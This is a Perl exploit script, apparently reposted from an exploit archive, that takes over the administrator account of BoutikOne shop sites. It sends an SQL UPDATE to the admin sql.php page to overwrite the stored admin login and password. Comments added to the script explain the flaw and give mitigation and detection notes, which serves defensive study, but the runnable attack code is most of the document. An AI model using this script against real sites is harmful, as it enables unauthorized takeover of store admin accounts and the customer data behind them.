BoutikOne CSRF Add User Vulnerability
来源:vfocus.net 作者:GarA 发布时间:2012-07-03
#!/usr/bin/perl -w
# Exploit Title: BoutikOne CSRF Add User
# Exploit Author: GarA
# Vendor Homepage: www.boutikone.com
# Tested on: Win Xp sp3
#
# What the script does, as read from the code below:
#   - It sends a single POST to http://<site>/<admin-path>/sql.php with one
#     form field, "request", whose value is a complete SQL UPDATE statement.
#   - The statement rewrites the `admin` and `motdepasse` columns of the row
#     with ID = 1 in the `admin` table, i.e. it replaces the credentials of
#     an existing row rather than inserting a new user.
#   - No cookie, session or credential is attached to the request, and the
#     script sends it itself rather than through an administrator's browser.
#     The "CSRF" label is the author's; what the code relies on is sql.php
#     executing the submitted statement (presumably without checking for an
#     authenticated session -- confirm against the product).
#
# Defender notes:
#   - Mitigation: an admin page that executes caller-supplied SQL should be
#     removed or restricted, and at minimum require an authenticated session
#     plus a per-request anti-CSRF token.
#   - The password is written to `motdepasse` exactly as supplied, which
#     suggests passwords are stored unhashed -- verify on an installation.
#   - Detection: POST requests to <admin-path>/sql.php whose body starts with
#     "request=UPDATE+admin+SET+motdepasse", a User-Agent beginning with
#     "AgentName/0.1", and an unexpected change to row 1 of the admin table.

use LWP::UserAgent;

# Console cosmetics only (Windows cmd built-ins); unrelated to the request.
system("color a");
system("cls");

# Exactly four arguments are expected; otherwise show the banner and usage.
if (@ARGV != 4) {
    print
        " :MM:....:HMMM .MMMMMMMMMM. \n",
        " .M .. MM. M. :MMMMH \n",
        " M M MH .MM M \n",
        " .M HM M: MMMMMMH \n",
        " HM MMH :M MMMMMMMMMMMH \n",
        " .M MMMMMMM: . .MMMMMMMMMMM. \n",
        " M MMMM :MMMMMMMMH H M MMMMMMMM: \n",
        " MMM . :MMMMMMMM M MMMMMM \n",
        " M HMM H MM HMMMMM M. MMMMM \n",
        " .: .M H.: MMHMM M .MMM \n",
        " . .MM MM M: M :MMH MMMMM M. HMMM HMMMM .M. .M MH \n",
        " .. :MMMM: .M . MM. HMH :. MMM. .M MM MH .MM MMM :M: \n",
        " H : :MMH M .MM MH .MM . MMMM :M. MM MHM MM \n",
        " MM HM: : HM MM M .MH .MMM: MM M..M.:M: \n",
        " HM: .MMM :M MM MM :H .MH MM MM .MMM MMMM \n",
        " MMMMHHMM :MH M HMMMMH MH MMMMM MM .MM \n",
        " \n",
        "\n BoutikOne CSRF Add User \n",
        "\nUsage: $0 www.site.com admin-path user password \n",
        "=========================================\n",
        " Exploit discovered & coded by GarA \n",
        " Gr33tz to : Dr.Sayr0s , Dr.BiLLi , Last Breath \n",
        " Dr.Milas , O-Snip3r , Ev!l Code , P4L-T3RRORIST \n",
        " Mr NoRvI , Dr.s@3d , Mr MeGa , ViRuS_PaL \n",
        " Mafia Hack Team & Scr3w & Arhack.net ";
    exit;
}

# Positional arguments: host, admin directory, new login name, new password.
my ($site, $admn, $usr, $pass) = @ARGV;

# HTTP client; its User-Agent is the LWP default prefixed with "AgentName/0.1 ".
my $ua            = LWP::UserAgent->new;
my $default_agent = $ua->agent;
$ua->agent("AgentName/0.1 $default_agent");

# The request targets sql.php under the admin directory. The form body is a
# pre-encoded UPDATE on the `admin` table with the two values spliced in.
my $target_url = sprintf 'http://%s/%s/sql.php', $site, $admn;
my $form_body  = join '',
    'request=UPDATE+admin+SET+motdepasse+%3D+%27', $pass,
    '%27+%2C+admin+%3D+%27',                       $usr,
    '%27+WHERE+ID+%3D+1';

my $req = HTTP::Request->new(POST => $target_url);
$req->content_type('application/x-www-form-urlencoded');
$req->content($form_body);

my $res = $ua->request($req);

# Success is judged only by a status phrase in the response body.
# NOTE(review): the accented characters in this pattern look mis-encoded in
# this copy of the page; the literal is kept exactly as found.
if ($res->content !~ m{SQL exйcutйe avec succ}) {
    print "Faild :s \n";
}
else {
    print "Don3 ~\n";
    print "usr :$usr\n";
    print "pwd :$pass\n";
    print "3nj0y \n";
}